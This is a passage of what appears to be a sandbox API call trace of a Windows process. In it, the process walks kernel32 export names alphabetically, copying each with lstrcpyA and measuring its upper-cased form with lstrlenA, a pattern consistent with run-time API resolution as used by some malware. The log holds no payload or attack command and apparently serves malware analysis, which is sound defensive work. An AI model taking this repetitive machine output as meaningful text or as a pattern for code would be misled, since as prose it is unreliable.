(in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.051] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.051] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.051] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.052] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.052] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.052] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.052] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.052] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.052] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.052] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.052] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.052] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.052] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.052] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.052] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.052] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.052] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.052] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.052] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.052] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.052] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.052] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.052] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.053] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.053] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.053] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.053] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.053] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.053] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.053] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.053] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.053] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.053] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.053] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.053] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.053] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.053] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.053] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.053] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.053] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.053] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.053] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.054] lstrlenA (lpString="BEEP") returned 4 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.054] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.054] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.054] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.054] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.054] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.054] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.054] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.054] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.054] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.054] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.054] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.054] lstrlenA (lpString="CANCELIO") returned 8 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.054] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.054] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.054] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.054] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.054] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.054] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.054] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.055] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.055] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.055] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.055] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.055] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.055] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.055] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.055] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.055] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.055] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.055] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.055] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.055] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.055] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.055] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.055] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.055] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.056] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.056] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.056] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.056] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.056] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.056] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.056] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.056] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.056] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.056] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.056] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.056] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.056] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.056] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.056] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.057] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.057] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.057] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.057] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.057] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.057] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.057] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.057] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.057] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.057] lstrlenA (lpString="COPYFILEA") returned 9 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.057] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.057] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.057] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.057] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.057] lstrlenA (lpString="COPYFILEW") returned 9 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.057] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.057] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.057] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.057] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.057] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.058] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.058] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.058] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.058] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.058] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.058] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.058] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.058] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.058] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.058] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.058] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.058] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.058] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.058] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.058] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.058] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: 